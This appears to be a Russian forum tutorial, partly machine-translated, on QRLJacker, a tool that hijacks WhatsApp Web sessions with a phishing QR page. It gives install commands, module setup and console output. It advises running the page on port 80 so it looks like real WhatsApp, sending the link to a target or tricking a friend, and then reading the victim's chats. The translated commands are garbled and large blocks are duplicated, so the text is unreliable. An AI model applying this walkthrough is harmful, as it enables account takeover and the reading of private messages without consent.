- 64
- 22
- 25 Фев 2019
Атаки социальной инженерии все еще работают. Большинство нападавших используют методы социальной инженерии, чтобы обмануть цели. По словам исследователя этического взлома Международного института кибербезопасности методы социальной инженерии используются в QRLJacker, инструменте, который используется для получения веб-сессий whats app. Вся программа написана на языке python. Этот инструмент работает по принципу фишинга. Фишинг-это тип атаки социальной инженерии, в которой создаются поддельные страницы входа или платежные страницы для сбора учетных данных пользователей.
QRLJacker является наиболее распространенным инструментом, используемым в whatsapp сессии угона, который может быть полезен в начальной фазе pentesting.
!\/ ! \/ ./
!/\ ! |\ ./
! \ ! / \ ./
! \______!______| \ ,/
! /\ ! ./\ ,/
! / \ ! | \ ,/
!/ \___!____| ,/ Everything is connected, even the simplest things!
! / \ _!__ *\,/
! ! \ ! \,/
! ! | \! ,/
!----------K/
! ! ,! /| QrlJacker-Framework By @D4Vinci - V2.1
! !/ / | Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh)
! / \ / | Loaded 1 grabber(s), 0 post module(s).
!\./ \/ |
!/\ / |
! \ / .o.
! \/
! / "
! /
! /
!/
!
!
!
General commands
=================
Command Description
--------- -------------
help/? Show this help menu.
os <command> Execute a system command without closing the framework
banner Display banner.
exit/quit Exit the framework.
Core commands
=============
Command Description
--------- -------------
database Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
debug Drop into debug mode or disable it. (Making identifying problems easier)
dev Drop into development mode or disable it. (Reload modules every use)
verbose Drop into verbose mode or disable it. (Make framework displays more details)
reload/refresh Reload the modules database.
Name Description
grabber/whatsapp Whatsapp QR-sessions grabber and controller
QrlJacker > use grabber/whatsapp
[+] port => 1337
QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
[+] host => 192.168.1.7
QrlJacker Module(grabber/whatsapp) > options
Name Current value Required Description
port 1337 Yes The local port to listen on.
host 192.168.1.7 Yes The local host to listen on.
useragent (default) Yes Make useragent is the (default) one, a (random) generated useragent or a specifed useragent
Type run, you can also run this on port 80 rather than 1337, to look it like a real page of whatsapp
Qrljacker Module (grabber/whatsapp) > > run
QrlJacker модуль(граббер/в WhatsApp) > беги
[+] использовать по умолчанию UserAgent
[+] выполняется поток, чтобы сохранить изображение QR [приложение WhatsApp]
[+] в ожидании сеансов на WhatsApp
[+] запуск потока для обнаружения холостого хода, когда это произойдет, нажмите на QR-перезагрузить кнопку [приложение WhatsApp]
[+] инициализация сервера... [в WhatsApp]
ID Module name Captured on
0 whatsapp Sat-Apr-13-04:53:03-2019
QRLJacker является наиболее распространенным инструментом, используемым в whatsapp сессии угона, который может быть полезен в начальной фазе pentesting.
- Для тестирования мы использовали Live Kali Linux 2019.4 amd64 . Во время тестирования QrlJacker иногда, QRLJacker не работал на установленных версиях Kali linux. Мы протестировали onLive загрузку Kali Linux 2018.4, 2018.3 & 2019.1 amd64 .
- Драйвер Geeko выступает в качестве движка веб-браузера, используемого в приложениях, разработанных Mozilla. Он создает связь между Selenium (модуль python)и браузером Mozilla. Для установки типа wget Для просмотра ссылки Войди
или Зарегистрируйся - Тип tar-xvzf geckodriver-v0. 24.0-linux64.смола.gz и измените каталог на извлеченный.
- Тип sudo mv-f geckodriver / usr / local / share/geckodriver
- Тип sudo ln -s / usr / local / share/geckodriver / usr / local / bin / geckodriver
- Введите sudo ln -s / usr / local / share/geckodriver / usr / bin/geckodriver
- Не забудьте обновить браузер firefox. Для этого типа sudo apt-get update & sudo apt-get install firefox-esr
- Тип apt-get install python3. 7
- Тип git клон Для просмотра ссылки Войди
или Зарегистрируйся - Тип python3. 7-m pip install-r требования.формат txt
- Тип python3. 7 QrlJacker.py
!\/ ! \/ ./
!/\ ! |\ ./
! \ ! / \ ./
! \______!______| \ ,/
! /\ ! ./\ ,/
! / \ ! | \ ,/
!/ \___!____| ,/ Everything is connected, even the simplest things!
! / \ _!__ *\,/
! ! \ ! \,/
! ! | \! ,/
!----------K/
! ! ,! /| QrlJacker-Framework By @D4Vinci - V2.1
! !/ / | Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh)
! / \ / | Loaded 1 grabber(s), 0 post module(s).
!\./ \/ |
!/\ / |
! \ / .o.
! \/
! / "
! /
! /
!/
!
!
!
- Введите справку
General commands
=================
Command Description
--------- -------------
help/? Show this help menu.
os <command> Execute a system command without closing the framework
banner Display banner.
exit/quit Exit the framework.
Core commands
=============
Command Description
--------- -------------
database Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
debug Drop into debug mode or disable it. (Making identifying problems easier)
dev Drop into development mode or disable it. (Reload modules every use)
verbose Drop into verbose mode or disable it. (Make framework displays more details)
reload/refresh Reload the modules database.
- Type list & type use grabber/whatsapp
Name Description
grabber/whatsapp Whatsapp QR-sessions grabber and controller
QrlJacker > use grabber/whatsapp
- Type options & type set port 1337
- Type set host 192.168.1.7
[+] port => 1337
QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
[+] host => 192.168.1.7
QrlJacker Module(grabber/whatsapp) > options
Name Current value Required Description
port 1337 Yes The local port to listen on.
host 192.168.1.7 Yes The local host to listen on.
useragent (default) Yes Make useragent is the (default) one, a (random) generated useragent or a specifed useragent
Type run, you can also run this on port 80 rather than 1337, to look it like a real page of whatsapp
Qrljacker Module (grabber/whatsapp) > > run
QrlJacker модуль(граббер/в WhatsApp) > беги
[+] использовать по умолчанию UserAgent
[+] выполняется поток, чтобы сохранить изображение QR [приложение WhatsApp]
[+] в ожидании сеансов на WhatsApp
[+] запуск потока для обнаружения холостого хода, когда это произойдет, нажмите на QR-перезагрузить кнопку [приложение WhatsApp]
[+] инициализация сервера... [в WhatsApp]
- После запуска сервера Qrljacker. Вы можете отправить эту ссылку на ваш целевой объект. Для тестирования мы открыли сгенерированный код QrlJacker на Windows 7. Тип 192.168.1.7: 1337
- Для использования мы открыли на whatsapp 2.19.98. Сканируйте QR-код в Whatsapp web вашего мобильного телефона или попросите вашего друга войти в whatsapp web с помощью методов социальной инженерии
- Перейдите в терминал, где вы запустили QrlJacker на Kali. Type sessions Sessions will показывает подключенные учетные записи Whats app к сеансам QrlJacker.
ID Module name Captured on
0 whatsapp Sat-Apr-13-04:53:03-2019
- Когда вы наберете sessions-i 0, веб-браузер Kali Linux откроется с целевой учетной записью Whatsapp сначала он откроется web.whatsapp.com-да.
- Но через 1 или 2 секунды целевая учетная запись Whatsapp откроется.
- Теперь вы можете увидеть все чаты whatsapp.
